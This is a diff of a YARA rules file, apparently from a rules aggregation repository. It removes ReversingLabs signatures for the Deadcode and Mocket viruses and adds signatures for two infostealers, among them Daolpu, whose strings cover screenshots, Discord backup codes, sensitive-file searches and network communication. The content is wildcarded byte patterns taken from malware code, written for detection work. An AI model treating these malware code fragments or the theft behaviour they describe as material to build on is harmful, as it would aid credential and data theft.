-            6A 54 FF B5 A8 00 00 00 FF 55 28 33 D2 64 8F 02 5A E8 DB 01 00 00 E8 F5 00 00 00 6A
-            00 FF 55 3C 64 67 8B 36 00 00 AD 83 F8 FF 74 04 8B F0 EB F6 8B 7E 04 81 E7 00 00 FF
-            FF 66 81 3F 4D 5A 74 08 81 EF 00 00 01 00 EB F1 8B DF 03 5B 3C 66 81 3B 50 45 74 02
-            EB E3 8B C7 C3 55 8B EC 8B 75 0C AC 84 C0 75 FB 2B 75 0C 8B CE 8B 5D 08 03 5B 3C 8B
-            5B 78 03 5D 08 8B 53 20 03 55 08 2B C0 8B 32 03 75 08 8B 7D 0C 51 FC F3 A6 59 74 06
+		$find_files_p4 = {
+            8B B4 24 ?? ?? ?? ?? 48 89 56 ?? 48 8B 94 24 ?? ?? ?? ?? 48 89 56 ?? 83 3D ?? ?? ??
+            ?? ?? 75 ?? 48 8B 94 24 ?? ?? ?? ?? EB ?? E8 ?? ?? ?? ?? 48 8B 94 24 ?? ?? ?? ?? 49
+            89 13 4C 8B 46 ?? 4D 89 43 ?? 48 89 56 ?? E9 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 51 ??
+            48 8B 84 24 ?? ?? ?? ?? FF D2 48 89 84 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 8B
+            4C 24 ?? 48 8B 49 ?? 48 8B 84 24 ?? ?? ?? ?? FF D1 48 89 44 24 ?? 44 0F 11 BC 24 ??
+            ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 5C 24 ?? 48 8B
+            84 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89
+            84 24 ?? ?? ?? ?? 48 8B 84 24 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
+            8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 54 24 ?? 0F
+            57 C0 F2 48 0F 2A C2 F2 0F 10 0D ?? ?? ?? ?? F2 0F 59 C1 66 48 0F 7E C0 0F 1F 40 ??
+            E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ??
+            48 8D 05 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D B4 24 ?? ?? ?? ??
+            41 B8 ?? ?? ?? ?? 4D 89 C1 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B B4 24 ?? ?? ??
+            ?? E9 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 8B 41 ?? 48 89 C2 48 F7 DA 48 8B 59 ??
+            90 48 39 D3 77 ?? 48 81 FB ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 0F 4F D9 48 8D 0D ?? ?? ??
+            ?? 48 0F 4F C1 48 81 C4 ?? ?? ?? ?? 5D C3
         }
-		$deadcode_body_2 = {
-            83 C2 04 40 EB EB 8B 73 24 03 75 08 2B D2 66 8B 14 46 8B 73 1C 03 75 08 8B 04 96 03
-            45 08 8B E5 5D C2 08 00 55 8B EC 8B 7D 08 8B 75 0C 8B 4D 14 51 56 57 56 FF 75 10 E8
-            91 FF FF FF 5F 5E 59 AB AC 84 C0 75 FB E2 E9 8B E5 5D C2 10 00 8B 6C 24 04 6A 04 68
-            00 10 00 00 68 40 01 00 00 6A 00 FF 55 08 85 C0 74 18 89 45 78 E8 63 01 00 00 68 00
-            40 00 00 68 40 01 00 00 FF 75 78 FF 55 28 6A 00 FF 55 40 C3
+		$take_screenshot_p1 = {
+            4C 8D A4 24 ?? ?? ?? ?? 4D 3B 66 ?? 0F 86 ?? ?? ?? ?? 55 48 89 E5 48 81 EC ?? ?? ??
+            ?? 0F 1F 00 E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 89 5C 24 ?? B8 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48
+            89 8C 24 ?? ?? ?? ?? 48 8B 8C 24 ?? ?? ?? ?? 48 89 8C 24 ?? ?? ?? ?? 48 89 9C 24 ??
+            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8
+            ?? ?? ?? ?? 48 89 44 24 ?? 48 89 5C 24 ?? B9 ?? ?? ?? ?? 90 E8 ?? ?? ?? ?? 48 8D BC
+            24 ?? ?? ?? ?? 48 8D 7F ?? 66 0F 1F 84 00 ?? ?? 00 00 66 0F 1F 44 00 ?? 48 89 6C 24
+            ?? 48 8D 6C 24 ?? E8 ?? ?? ?? ?? 48 8B 6D ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48
+            8D 05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D
+            05 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 05
+            ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 05 ??
+            ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 C7 84 24 ?? ?? ?? ?? ?? ?? ?? ?? 48 8D 05 ?? ??
+            ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? BB ?? ?? ?? ?? 48 8D 8C 24 ?? ??
+            ?? ?? BF ?? ?? ?? ?? 48 89 FE E8 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 05 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? C6 00 ?? 48 8B 8C 24 ?? ?? ?? ?? 84 01 83 3D ?? ?? ?? ?? ?? 75
+            ?? 48 8B 54 24 ?? EB ?? E8 ?? ?? ?? ?? 49 89 03 48 8B 91 ?? ?? ?? ?? 49 89 53 ?? 48
         }
-
-	condition:
-		uint16( 0 ) == 0x5A4D and ( ( ( $deadcode_ep_1 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( ( $deadcode_ep_2 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( ( $deadcode_ep_3 at pe.entry_point ) and ( $deadcode_marker at 0x40 ) ) or ( $deadcode_body_1 and $deadcode_body_2 ) )
+		$take_screenshot_p2 = {
+            8B 54 24 ?? 49 89 53 ?? 48 8B 59 ?? 49 89 5B ?? 48 89 81 ?? ?? ?? ?? 48 8B 5C 24 ??
+            48 89 59 ?? 48 89 51 ?? 48 89 C8 E8 ?? ?? ?? ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? E8 ??
+            ?? ?? ?? 0F 1F 44 00 ?? 48 85 FF 75 ?? 31 C9 31 D2 31 F6 EB ?? 31 C0 31 DB 48 89 D9
+            48 81 C4 ?? ?? ?? ?? 5D C3 48 89 04 3E 48 8B 84 24 ?? ?? ?? ?? 48 83 C0 ?? 48 8B 5C
+            24 ?? 48 FF CB 48 89 D7 48 89 F2 48 89 FE 66 90 48 85 DB 0F 8E ?? ?? ?? ?? 48 89 5C
+            24 ?? 48 89 94 24 ?? ?? ?? ?? 48 89 4C 24 ?? 48 89 84 24 ?? ?? ?? ?? 48 8B 08 48 8B
+            50 ?? 48 8D 5E ?? 48 89 5C 24 ?? 48 8B 49 ?? 48 89 D0 FF D1 44 0F 11 BC 24 ?? ?? ??
+            ?? 44 0F 11 BC 24 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 89 8C 24 ?? ?? ?? ?? 48 8B 54 24 ??
+            48 89 94 24 ?? ?? ?? ?? 48 89 9C 24 ?? ?? ?? ?? 48 89 84 24 ?? ?? ?? ?? 48 8D 84 24
+            ?? ?? ?? ?? BB ?? ?? ?? ?? 48 89 D9 E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 48 8B 54 24 ?? 48
+            39 D1 72 ?? 48 8B B4 24 ?? ?? ?? ?? EB ?? 48 89 44 24 ?? 48 89 5C 24 ?? 48 8B 84 24
+            ?? ?? ?? ?? 48 89 D3 BF ?? ?? ?? ?? 48 8D 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 C6 48
+            89 DA 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8D 7A ?? 48 C1 E7 ?? 48 89 5C 3E ?? 83 3D ??
+            ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 89 03 4C 8B 04 3E 4D 89 43 ?? E9 ??
+            ?? ?? ?? 48 89 D0 48 89 F3 48 81 C4 ?? ?? ?? ?? 5D C3
+        }
+		$get_discord_backup_codes = {
+            48 89 44 24 ?? 48 8D 1D ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B BC 24 ?? ?? ?? ?? 48 8B B4
+            24 ?? ?? ?? ?? 49 89 D8 49 89 C9 31 C0 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ??
+            48 8B 5C 24 ?? 48 8D 0D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ??
+            ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 83 3D ?? ?? ?? ?? ?? 66 90 75 ?? 48 8B 54 24 ?? EB
+            ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 49 89 13 48 8B 58 ?? 49 89 5B ?? 48 89 50 ?? E8 ??
+            ?? ?? ?? 48 89 44 24 ?? 48 89 C3 48 8D 0D ?? ?? ?? ?? BF ?? ?? ?? ?? 48 8D 05 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 48 89 08 83 3D ?? ?? ?? ?? ?? 74 ?? 48 8B
+            50 ?? 66 90 E8 ?? ?? ?? ?? 49 89 13 48 8D 15 ?? ?? ?? ?? 48 89 50 ?? 31 C0 48 8D 1D
+            ?? ?? ?? ?? B9 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8B 74 24 ?? 49 89 D8 49 89 C9 E8 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 5C 24 ?? 48 8D 0D ?? ?? ?? ?? BF ?? ?? ??
+            ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 10 83 3D ?? ?? ??
+            ?? ?? 75 ?? 48 8B 4C 24 ?? EB ?? E8 ?? ?? ?? ?? 48 8B 4C 24 ?? 49 89 0B 48 8B 50 ??
+            49 89 53 ?? 48 89 48 ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 75
+            ?? 48 8B 54 24 ?? EB ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 49 89 13 48 89 10 BB ?? ?? ??
+            ?? 48 89 D9 E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B 5C 24 ?? 48 8D 0D ?? ?? ?? ?? BF ??
+            ?? ?? ?? 48 8D 05 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 89 10 83 3D ??
+            ?? ?? ?? ?? 75 ?? 48 8B 54 24 ?? EB ?? E8 ?? ?? ?? ?? 48 8B 54 24 ?? 49 89 13 4C 8B
+            48 ?? 4D 89 4B ?? 48 89 50 ?? 48 8B 44 24 ?? 48 8B 5C 24 ?? 48 8B 4C 24 ?? 31 FF 31
+            F6 49 89 F0 E8 ?? ?? ?? ?? 31 C0 31 DB 48 83 C4 ?? 5D C3
+        }
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( $get_mac_address ) and ( all of ( $find_files_p* ) ) and ( all of ( $take_screenshot_p* ) ) and ( $get_discord_backup_codes )
 }
-
-rule REVERSINGLABS_Win32_Virus_Mocket : TC_DETECTION MALICIOUS MALWARE FILE
+rule REVERSINGLABS_Win64_Infostealer_Daolpu : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Yara rule that detects Mocket virus."
+		description = "Yara rule that detects Daolpu infostealer."
 		author = "ReversingLabs"
-		id = "878c2162-9a79-52e6-af7b-95f9667f9e78"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "bf815556-6ccf-506a-b858-5f4c18282c05"
+		date = "2024-08-26"
+		modified = "2024-08-26"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/virus/Win32.Virus.Mocket.yara#L3-L58"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "af16974396efe7a1a46aa39b812482dcc49d0fe95db6640c1703db479e7ea9dc"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/infostealer/Win64.Infostealer.Daolpu.yara#L1-L322"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5ffd0427c6c8e666cfabc48426e7771595a7024548706f37a1de3538e4e2d559"
 		score = 75
 		quality = 90
 		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
 		category = "MALWARE"
-		tc_detection_type = "Virus"
-		tc_detection_name = "Mocket"
+		tc_detection_type = "Infostealer"
+		tc_detection_name = "Daolpu"
 		tc_detection_factor = 5
 		importance = 25
 
 	strings:
-		$mocket_body_1 = {
-            E8 00 00 00 00 5B 81 EB ?? ?? ?? ?? 8B 34 24 81 E6 00 00 FF FF E8 31 00 00 00 89 83 ?? ?? ?? ?? E8 4C 00 00 00 89 83 ??
-            ?? ?? ?? E8 A2 00 00 00 E8 CD 00 00 00 E8 05 01 00 00 87 CB E3 0C B8 ?? ?? ?? ?? 05 ?? ?? ?? ?? FF E0 C3 66 81 3E 4D 5A
-            75 0E 8B 7E 3C 03 FE 66 81 3F 50 45 75 02 96 C3 81 EE 00 00 01 00 81 FE 00 00 00 70 73 DD 33 C0 C3 8B 70 3C 03 F0 8B 76
-            78 03 F0 56 8B 76 20 03 F0 8B C6 33 D2 33 C9 8A 8B ?? ?? ?? ?? 8D BB ?? ?? ?? ?? 8B 34 02 03 B3 ?? ?? ?? ?? 83 C2 04 F3
-            A6 75 E2 5E 8B C6 83 EA 04 D1 EA 8B 40 24 03 83 ?? ?? ?? ?? 33 C9 66 8B 0C 02 8B C6 8B 40 1C 03 83 ?? ?? ?? ?? C1 E1 02
-            8B 04 01 03 83 ?? ?? ?? ?? C3 8D BB ?? ?? ?? ?? 8D B3 ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 89 06
-            83 C6 04 B9 FF FF FF FF 32 C0 F2 AE 80 3F 90 75 DD C3 8D BB ?? ?? ?? ?? 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7
-            80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 81 C7 80 00 00 00 57 68 80 00 00 00 8B 83 ?? ?? ?? ?? FF D0 C3 33
-            C9 B1 03 8D BB ?? ?? ?? ?? 57 8B 83 ?? ?? ?? ?? FF D0 E8 01 00 00 00 C3 C7 83 ?? ?? ?? ?? 00 00 00 00 8D 83 ?? ?? ?? ??
+		$network_communication = {
+            48 89 5C 24 ?? 48 89 6C 24 ?? 48 89 7C 24 ?? 41 56 48 83 EC ?? 48 8B D9 49 8B E8 B9
+            ?? ?? ?? ?? 4C 8B F2 E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 0F 84 ?? ?? ??
+            ?? 4C 8D 05 ?? ?? ?? ?? 48 89 74 24 ?? BA ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 83
+            7B ?? ?? 4C 8D 43 ?? 76 ?? 4D 8B 00 BA ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? BA ?? ??
+            ?? ?? 48 8B CF 44 8D 42 ?? E8 ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B
+            CF E8 ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B CF E8 ?? ??
+            ?? ?? 48 8B C8 48 8B F0 E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ??
+            ?? ?? ?? 49 83 7E ?? ?? 49 8D 56 ?? 76 ?? 48 8B 12 48 8B CB E8 ?? ?? ?? ?? 48 8B CE
+            E8 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 48 83 7D ?? ??
+            48 8D 55 ?? 76 ?? 48 8B 12 49 C7 C0 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 48 8B CE E8
+            ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 48 8B D8 E8 ?? ?? ?? ?? 49 C7 C0 ?? ?? ??
+            ?? 48 8D 15 ?? ?? ?? ?? 48 8B CB E8 ?? ?? ?? ?? 4C 8B C6 BA ?? ?? ?? ?? 48 8B CF E8
+            ?? ?? ?? ?? 48 8B CF E8 ?? ?? ?? ?? 8B E8 85 C0 75 ?? 48 8D 1D ?? ?? ?? ?? 48 8D 05
+            ?? ?? ?? ?? EB ?? 48 8D 15 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B CD 48
+            8B D8 E8 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
+            CE E8 ?? ?? ?? ?? 48 8B 74 24 ?? 48 8B CF E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B 5C 24
+            ?? 33 C0 48 8B 6C 24 ?? 48 8B 7C 24 ?? 48 83 C4 ?? 41 5E C3
         }
-		$mocket_body_2 = {
-            50 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 40 0B C0 74 53 48 89 83 ?? ?? ?? ?? E8 48 00 00 00 FE 83 ?? ?? ?? ?? 80
-            BB ?? ?? ?? ?? 0A 74 29 8D BB ?? ?? ?? ?? B9 ?? ?? ?? ?? 32 C0 F3 AA 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? 50 8B 83 ??
-            ?? ?? ?? FF D0 0B C0 75 C3 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 60 8D B3 ?? ?? ?? ?? 56 8B 83 ?? ?? ?? ?? FF
-            D0 89 83 ?? ?? ?? ?? 68 80 00 00 00 56 8B 83 ?? ?? ?? ?? FF D0 E8 B7 01 00 00 40 0B C0 0F 84 75 01 00 00 48 89 83 ?? ??
-            ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0 0F 84 4D 01 00 00 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 B4 01 00 00 0B C0
-            0F 84 26 01 00 00 89 83 ?? ?? ?? ?? 8B 70 3C 03 F0 66 81 3E 50 45 0F 85 F7 00 00 00 81 7E 4C 4B 43 4F 4D 0F 84 EA 00 00
-            00 8B 4E 3C 51 8B 46 28 89 83 ?? ?? ?? ?? 8B 46 34 89 83 ?? ?? ?? ?? FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ??
-            ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 59 8B 83 ?? ?? ?? ?? 05 ?? ?? ?? ?? E8 5C 01 00 00 89 83 ?? ?? ?? ?? 91 E8 21 01 00 00
-            40 0B C0 0F 84 B9 00 00 00 48 89 83 ?? ?? ?? ?? 8B 8B ?? ?? ?? ?? E8 1F 01 00 00 0B C0 0F 84 91 00 00 00 89 83 ?? ?? ??
+		$find_sensitive_files_p1 = {
+            48 89 5C 24 ?? 55 56 57 41 54 41 55 41 56 41 57 48 8D AC 24 ?? ?? ?? ?? 48 81 EC ??
+            ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 85 ?? ?? ?? ?? 4C 8B F2 48 8B F9 45 33
+            E4 4C 89 65 ?? 0F 57 C0 0F 11 45 ?? 0F 57 C9 F3 0F 7F 4D ?? 49 C7 C0 ?? ?? ?? ?? 49
+            FF C0 66 46 39 24 41 75 ?? 48 8B D7 48 8D 4D ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ??
+            48 8D 15 ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D 4D ?? 48 83 7D ?? ?? 48 0F 47
+            4D ?? 48 8D 55 ?? FF 15 ?? ?? ?? ?? 4C 8B F8 0F 57 C0 F3 0F 7F 45 ?? 0F 57 C9 F3 0F
+            7F 4D ?? B9 ?? ?? ?? ?? E8 ?? ?? ?? ?? 4C 89 60 ?? 48 89 45 ?? 48 8D 4D ?? 48 89 08
+            49 83 FF ?? 0F 84 ?? ?? ?? ?? 4C 8D 2D ?? ?? ?? ?? F6 45 ?? ?? 0F 84 ?? ?? ?? ?? 0F
+            B7 4D ?? 0F B7 45 ?? 66 83 F9 ?? 75 ?? 66 85 C0 0F 84 ?? ?? ?? ?? 66 3B C9 75 ?? 66
+            3B C1 75 ?? 66 83 7D ?? ?? 0F 84 ?? ?? ?? ?? 4C 89 64 24 ?? 0F 57 C0 0F 11 44 24 ??
+            4C 89 65 ?? 4C 89 65 ?? 49 C7 C0 ?? ?? ?? ?? 66 0F 1F 84 00 ?? ?? 00 00 49 FF C0 66
+            42 83 3C 47 ?? 75 ?? 48 8B D7 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? 48
+            8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 0F
+            1F 44 00 ?? 49 FF C0 66 42 83 3C 40 ?? 75 ?? 48 8D 55 ?? 48 8D 4C 24 ?? E8 ?? ?? ??
+            ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 49 8B D6 E8 ?? ?? ?? ?? 90 48 8D
+            4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 45 ?? 49 83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ??
+            E8 ?? ?? ?? ?? 4C 89 65 ?? 48 C7 45 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ??
+            4C 89 64 24 ?? E9 ?? ?? ?? ?? 4C 89 65 ?? 0F 57 C0 0F 11 45 ?? 4C 89 65 ?? 4C 89 65
+            ?? 48 8D 45 ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 66 42 83 3C 40 ?? 75 ?? 48 8D 55 ?? 48
         }
-		$mocket_body_3 = {
-            ?? 8B 70 3C 03 F0 8B FE 83 C6 78 8B 57 74 C1 E2 03 03 F2 0F B7 47 06 48 6B C0 28 03 F0 8B 56 10 8B CA 03 56 14 52 8B C1
-            03 46 0C 89 47 28 8B 46 10 05 ?? ?? ?? ?? 8B 4F 3C E8 EA 00 00 00 89 46 10 89 46 08 8B 46 10 03 46 0C 89 47 50 81 4E 24
-            20 00 00 A0 C7 47 4C 4B 43 4F 4D 8D B3 ?? ?? ?? ?? 5A 87 FA 03 BB ?? ?? ?? ?? B9 ?? ?? ?? ?? F3 A4 EB 0B 8B 8B ?? ?? ??
-            ?? E8 41 00 00 00 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ??
-            8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8D 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 61 C3 33 C0 50 50 51 FF B3 ?? ??
-            ?? ?? 8B 83 ?? ?? ?? ?? FF D0 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 C0 50 50 6A 03 50 6A 01 68 00 00 00 C0 56
-            8B 83 ?? ?? ?? ?? FF D0 C3 6A 00 51 6A 00 6A 04 6A 00 8B 83 ?? ?? ?? ?? 50 8B 83 ?? ?? ?? ?? FF D0 C3 51 6A 00 6A 00 6A
-            02 FF B3 ?? ?? ?? ?? 8B 83 ?? ?? ?? ?? FF D0 C3 33 D2 F7 F1 0B D2 74 01 40 F7 E1 C3
+		$find_sensitive_files_p2 = {
+            8D 4D ?? E8 ?? ?? ?? ?? 90 4C 8D 55 ?? 48 8B 5D ?? 48 8B 75 ?? 48 83 FE ?? 4C 0F 47
+            D3 4C 8B 5D ?? 49 83 FB ?? 72 ?? 49 8D 4B ?? 48 C7 C0 ?? ?? ?? ?? 48 3B C8 48 0F 42
+            C1 4D 8D 0C 42 4D 8B C1 4D 2B C5 66 41 83 39 ?? 75 ?? BA ?? ?? ?? ?? 49 8B C5 42 0F
+            B7 0C 00 66 3B 08 75 ?? 48 83 C0 ?? 48 83 EA ?? 75 ?? 4D 2B CA 49 D1 F9 EB ?? 4D 3B
+            CA 74 ?? 49 83 E9 ?? 49 83 E8 ?? EB ?? 49 C7 C1 ?? ?? ?? ?? 49 83 F9 ?? 0F 84 ?? ??
+            ?? ?? 49 FF C1 4C 89 64 24 ?? 0F 57 C0 0F 11 44 24 ?? 4C 89 65 ?? 4C 89 65 ?? 4D 3B
+            D9 0F 82 ?? ?? ?? ?? 4D 2B D9 49 C7 C0 ?? ?? ?? ?? 4D 3B D8 4D 0F 42 C3 48 8D 45 ??
+            48 83 FE ?? 48 0F 47 C3 4A 8D 14 48 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ??
+            48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ??
+            ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48
+            8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 48 83 7D ??
+            ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 48
+            8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85
+            C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 85 C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48 8D 15 ?? ??
+            ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ?? 48 8D 4C 24 ?? 48 83 7D ?? ?? 48 0F 47 4C 24 ?? 48
+            8D 15 ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 4C 89 64 24 ?? 0F 57 C0 0F
+            11 44 24 ?? 4C 89 64 24 ?? 4C 89 64 24 ?? 49 C7 C0 ?? ?? ?? ?? 49 FF C0 66 42 83 3C
+        }
+		$find_sensitive_files_p3 = {
+            47 ?? 75 ?? 48 8B D7 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 41 B8 ?? ?? ?? ?? 48 8D 15 ??
+            ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48 8B D0 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 90 48
+            8D 55 ?? 48 83 7D ?? ?? 48 0F 47 55 ?? 4C 8B 45 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 48
+            8B D0 48 8D 4D ?? E8 ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49
+            83 F8 ?? 76 ?? 48 8B 54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 64 24 ?? 48 C7 44
+            24 ?? ?? ?? ?? ?? 66 44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 90 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 8B 44 24 ?? 49 83 F8 ?? 76 ?? 48 8B
+            54 24 ?? 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4C 89 64 24 ?? 48 C7 44 24 ?? ?? ?? ?? ?? 66
+            44 89 64 24 ?? 48 8B 4C 24 ?? 4C 89 64 24 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 49 8B 46
